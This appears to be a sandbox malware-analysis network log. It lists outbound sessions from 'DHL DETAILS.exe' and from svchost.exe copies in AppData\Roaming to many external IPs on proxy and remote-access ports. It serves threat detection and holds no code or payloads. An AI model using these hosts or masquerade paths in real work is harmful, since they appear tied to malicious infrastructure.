Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5642	192.168.2.5	54669	43.153.71.58	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5643	192.168.2.5	54670	43.153.71.58	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5644	192.168.2.5	54726	43.153.71.58	443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5645	192.168.2.5	53238	117.160.250.131	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5646	192.168.2.5	53974	172.104.251.179	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5647	192.168.2.5	51485	13.234.24.116	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5648	192.168.2.5	54049	147.75.92.251	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5649	192.168.2.5	54005	45.120.178.197	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5650	192.168.2.5	54021	13.37.89.201	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5651	192.168.2.5	53719	138.2.73.157	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5652	192.168.2.5	54007	60.246.122.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5653	192.168.2.5	54382	198.37.57.112	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5654	192.168.2.5	53804	47.91.104.88	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5655	192.168.2.5	54020	185.38.111.1	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5656	192.168.2.5	49324	64.227.108.25	31908	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5657	192.168.2.5	54022	221.224.44.91	7302	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5658	192.168.2.5	54179	8.210.80.191	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5659	192.168.2.5	54210	51.77.222.4	8118	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5660	192.168.2.5	54151	43.155.170.35	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5661	192.168.2.5	51747	189.240.60.169	9090	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5662	192.168.2.5	51682	148.72.215.230	44387	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5663	192.168.2.5	54109	178.54.21.203	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5664	192.168.2.5	54591	199.188.93.214	9000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5665	192.168.2.5	54280	89.185.212.198	32000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5666	192.168.2.5	54284	119.23.148.173	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5667	192.168.2.5	54431	185.103.101.39	10051	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5668	192.168.2.5	54348	8.219.177.134	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5669	192.168.2.5	54023	103.190.54.141	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5670	192.168.2.5	64273	45.65.138.48	999	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5671	192.168.2.5	54486	43.163.192.3	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5672	192.168.2.5	51325	203.124.53.122	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5673	192.168.2.5	51996	62.112.10.26	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5674	192.168.2.5	62299	149.102.130.120	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5675	192.168.2.5	54491	3.9.71.167	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5676	192.168.2.5	54493	147.75.92.251	10006	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5677	192.168.2.5	64272	209.14.112.2	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5678	192.168.2.5	52243	72.167.222.102	9493	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5679	192.168.2.5	54209	94.131.60.199	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5680	192.168.2.5	54998	104.16.143.127	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5681	192.168.2.5	55052	172.67.181.149	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5682	192.168.2.5	55071	104.25.231.184	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5683	192.168.2.5	52200	104.16.241.204	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5684	192.168.2.5	54587	18.133.16.21	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5685	192.168.2.5	55100	172.67.181.11	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5686	192.168.2.5	52052	46.231.72.35	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5687	192.168.2.5	51910	46.98.185.160	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5688	192.168.2.5	62265	195.78.100.162	3629	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5689	192.168.2.5	55225	172.67.181.9	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5690	192.168.2.5	52228	92.204.135.37	8623	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5691	192.168.2.5	54666	154.12.178.107	29985	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5692	192.168.2.5	54636	193.84.89.202	8443	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5693	192.168.2.5	54648	94.130.94.45	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5694	192.168.2.5	54605	39.99.144.43	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5695	192.168.2.5	64394	107.180.88.173	35774	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5696	192.168.2.5	54560	195.87.217.75	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5697	192.168.2.5	55243	104.19.109.209	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5698	192.168.2.5	54642	218.65.6.150	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5699	192.168.2.5	49634	125.227.225.157	3389	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5700	192.168.2.5	54688	43.131.242.162	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5701	192.168.2.5	54847	13.40.239.130	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5702	192.168.2.5	54765	77.91.74.77	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5703	192.168.2.5	54745	185.81.153.162	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5704	192.168.2.5	54838	195.248.243.149	7237	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5705	192.168.2.5	55043	3.127.62.252	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5706	192.168.2.5	54791	216.9.224.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5707	192.168.2.5	52654	69.167.169.46	12903	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5708	192.168.2.5	55053	185.110.190.99	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5709	192.168.2.5	55086	114.156.77.107	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5710	192.168.2.5	52541	139.162.224.37	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5711	192.168.2.5	52575	51.15.242.202	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5712	192.168.2.5	52425	45.11.95.165	6039	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5713	192.168.2.5	52557	190.186.18.161	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5714	192.168.2.5	49467	45.174.87.18	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5715	192.168.2.5	52684	207.180.234.220	37736	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5716	192.168.2.5	49473	190.94.212.125	999	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5717	192.168.2.5	55230	8.219.179.237	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5718	192.168.2.5	55297	199.188.93.214	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5719	192.168.2.5	55294	142.4.123.41	80

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5720	192.168.2.5	55203	162.55.87.48	5566	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5721	192.168.2.5	53326	91.92.155.207	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5722	192.168.2.5	55229	82.137.244.244	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5723	192.168.2.5	55393	54.67.125.45	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5724	192.168.2.5	53042	67.43.236.20	18203	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5725	192.168.2.5	55366	162.214.165.203	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5726	192.168.2.5	49444	51.75.125.208	48114	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5727	192.168.2.5	55502	104.20.56.71	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5728	192.168.2.5	55528	104.16.226.6	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5729	192.168.2.5	49485	181.143.11.157	10219	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5730	192.168.2.5	52606	94.131.14.66	1081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5731	192.168.2.5	52579	91.134.140.160	8879	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5732	192.168.2.5	54633	180.250.159.49	4153	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5733	192.168.2.5	55606	104.16.105.15	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5734	192.168.2.5	49492	177.234.244.174	32213	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5735	192.168.2.5	55638	104.22.37.236	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5736	192.168.2.5	55584	164.92.86.113	57391	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5737	192.168.2.5	55408	172.93.213.177	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5738	192.168.2.5	55778	202.159.19.213	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5739	192.168.2.5	55781	202.159.19.213	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5740	192.168.2.5	55787	202.159.19.213	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5741	192.168.2.5	55795	202.159.19.213	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5742	192.168.2.5	55652	23.227.38.198	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5743	192.168.2.5	53140	173.212.240.168	10267	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5744	192.168.2.5	64509	154.85.58.149	80	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5745	192.168.2.5	51712	142.54.232.6	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5746	192.168.2.5	55293	49.228.131.169	5000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5747	192.168.2.5	55650	23.152.40.15	5050	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5748	192.168.2.5	55703	104.19.217.219	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5749	192.168.2.5	49570	162.240.231.211	62109	43080	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5750	192.168.2.5	55328	5.252.23.220	1081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5751	192.168.2.5	55412	119.196.168.183	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5752	192.168.2.5	55385	193.8.87.43	4444	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5753	192.168.2.5	56024	43.152.192.217	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5754	192.168.2.5	56028	43.152.192.217	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5755	192.168.2.5	56030	43.152.192.217	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5756	192.168.2.5	56031	43.152.192.217	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5757	192.168.2.5	53772	74.119.144.60	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5758	192.168.2.5	55481	203.222.24.36	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5759	192.168.2.5	55737	104.16.105.182	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5760	192.168.2.5	55728	104.25.244.70	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5761	192.168.2.5	55518	45.120.178.197	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5762	192.168.2.5	55743	104.27.66.31	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5763	192.168.2.5	56039	202.159.35.189	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5764	192.168.2.5	55302	43.133.136.208	8800	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5765	192.168.2.5	56052	202.159.35.189	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5766	192.168.2.5	56066	202.159.35.189	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5767	192.168.2.5	56100	202.159.35.189	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5768	192.168.2.5	55570	60.246.122.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5769	192.168.2.5	52196	72.217.158.202	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5770	192.168.2.5	55600	82.64.77.30	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5771	192.168.2.5	55295	93.171.220.229	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5772	192.168.2.5	55747	172.67.182.38	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5773	192.168.2.5	55391	103.120.6.46	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5774	192.168.2.5	55777	104.18.254.76	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5775	192.168.2.5	49417	45.195.149.79	1080	56176	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5776	192.168.2.5	55579	78.30.128.10	8080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5777	192.168.2.5	55450	139.129.202.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5778	192.168.2.5	55783	159.89.138.130	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5779	192.168.2.5	55589	8.222.152.158	55555	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5780	192.168.2.5	53174	201.91.82.155	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5781	192.168.2.5	55861	172.64.86.217	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5782	192.168.2.5	55810	162.214.225.223	43435	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
